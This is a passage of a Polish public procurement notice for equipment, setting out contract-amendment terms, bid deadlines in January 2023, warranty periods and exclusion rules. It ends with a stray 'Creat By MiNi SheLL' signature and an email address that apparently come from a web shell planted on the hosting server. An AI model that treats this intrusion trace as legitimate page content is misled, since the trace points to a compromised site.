10.1, SWZ Zamawiający żąda od Wykonawcy pełnomocnictwa lub innego dokumentu potwierdzającego<br/>umocowanie do reprezentowania Wykonawcy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 10.4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego:<br/>a) ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Przepis pkt 10.3. stosuje się odpowiednio do osoby<br/>działającej w imieniu tych Wykonawców.<br/>b) dołączają do oferty oświadczenie, z którego wynika, które usługi/dostawy wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiana postanowień niniejszej umowy może nastąpić w formie pisemnego aneksu pod rygorem nieważności w następujących przypadkach:<br/>a) w zakresie danych adresowych Wykonawcy;<br/>1) w zakresie zmiany producenta lub modelu sprzętu (zastąpienie produktu lub rozszerzenie asortymentu o produkt<br/>równoważny lub wyższej jakości) w przypadku:<br/>• zaprzestania wytwarzania produktu objętego umową, w tym czasowego wstrzymania produkcji, pod warunkiem iż<br/>odpowiednik jest tej samej lub wyższej jakości, za cenę nie wyższą niż cena produktu objętego umową,<br/>• wprowadzenia do sprzedaży przez producenta zmodyfikowanego/udoskonalonego produktu, za cenę nie wyższą niż cena<br/>produktu objętego umową,<br/>• wprowadzenia do sprzedaży przez producenta zmodyfikowanego/udoskonalonego produktu, obok dotychczas<br/>oferowanego za cenę nie wyższą niż cena produktu objętego umową,<br/>• zmiany numeru katalogowego produktu, nazwy produktu, przy zachowaniu jego parametrów,<br/>b)zmiany obowiązujących przepisów, jeżeli konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego,<br/>c) zaistnienie okoliczności, których nie można było przewidzieć w chwili zawarcia umowy,<br/>d) niezbędna zmiana sposobu i terminu wykonania Umowy ze względów technicznych, technologicznych lub<br/>organizacyjnych, o ile zmiana taka jest korzystna dla Zamawiającego lub konieczna w celu prawidłowego wykonania<br/>Umowy, a brak zmiany sposobu bądź terminu wykonania umowy skutkowałby niewykonaniem lub wadliwym wykonaniem<br/>przedmiotu umowy, pod warunkiem, że Wykonawca zaoferuje rozwiązania techniczne, technologiczne lub organizacyjne o<br/>równoważnych lub lepszych parametrach;<br/>e) wystąpienia zdarzeń siły wyższej jako zdarzenia zewnętrznie niemożliwego do przewidzenia i niemożliwego do<br/>zapobieżenia,<br/>f) gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych lub zaleceń Instytucji, która przyznała<br/>środki na sfinansowanie umowy.<br/>2. Inicjatorem zmian może być Zamawiający lub Wykonawca poprzez pisemne wystąpienie w okresie obowiązywania<br/>umowy zawierające opis proponowanych zmian i ich uzasadnienie. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-01-26 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z załącznikami należy zamieścić na platformie zakupowej zamawiającego https://zamowieniapubliczne.powiatlidzbarski.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-01-26 12:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-02-24</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający nie przewiduje zatrudnienia osób, o których mowa w art. 96 ust. 2 pkt 2. 2.. Zamawiający nie przewiduje udzielania zamówień, o których mowa w art. 214 ust. 1 pkt 7 i 8 Ustawy. 3. Zamawiający nie przewiduje obowiązku odbycia przez Wykonawcę wizji lokalnej oraz sprawdzenia przez Wykonawcę dokumentów niezbędnych do realizacji zamówienia<br/>dostępnych na miejscu u Zamawiającego. 4. Zamawiający nie przewiduje rozliczenia w walutach obcych. 5. Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy (podwykonawcom).<br/>6.Zamawiający nie zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowych części zamówienia. 7.Termin<br/>gwarancji:<br/>1) minimalny okres gwarancji jakości i rękojmi za wady na całość sprzętu objętego niniejszym zamówieniem wynosi 36<br/>miesięcy, licząc od daty podpisania odbioru sprzętu bez zastrzeżeń,<br/>2) maksymalny okres gwarancji jakości i rękojmi za wady na całość sprzętu objętego niniejszym zamówieniem wynosi: 60<br/>miesięcy, licząc od daty podpisania protokołu odbioru sprzętu bez zastrzeżeń. 8. Zamawiający wykluczy z postępowania<br/>Wykonawcę w stosunku, do którego zachodzą okoliczności wskazane w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o<br/>szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego9. W przypadku gdy dokumenty elektroniczne w postępowaniu, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów<br/>ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2020 r. poz. 1913), Wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku (§ 4 ust. 1 ww. Rozporządzenia). 10. Zamawiający, niezwłocznie po otwarciu ofert, udostępnia na stronie internetowej prowadzonego postępowania informacje o: 1) nazwach albo imionach i nazwiskach oraz siedzibach lub miejscach prowadzonej działalności gospodarczej albo miejscach zamieszkania wykonawców, których oferty zostały otwarte;<br/>2) cenach zawartych w ofertach.<br/>18.2. Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, jeżeli wymagał ich złożenia w ogłoszeniu o zamówieniu lub dokumentach zamówienia, aktualnych na dzień złożenia podmiotowych środków dowodowych.

Creat By MiNi SheLL
Email: jattceo@gmail.com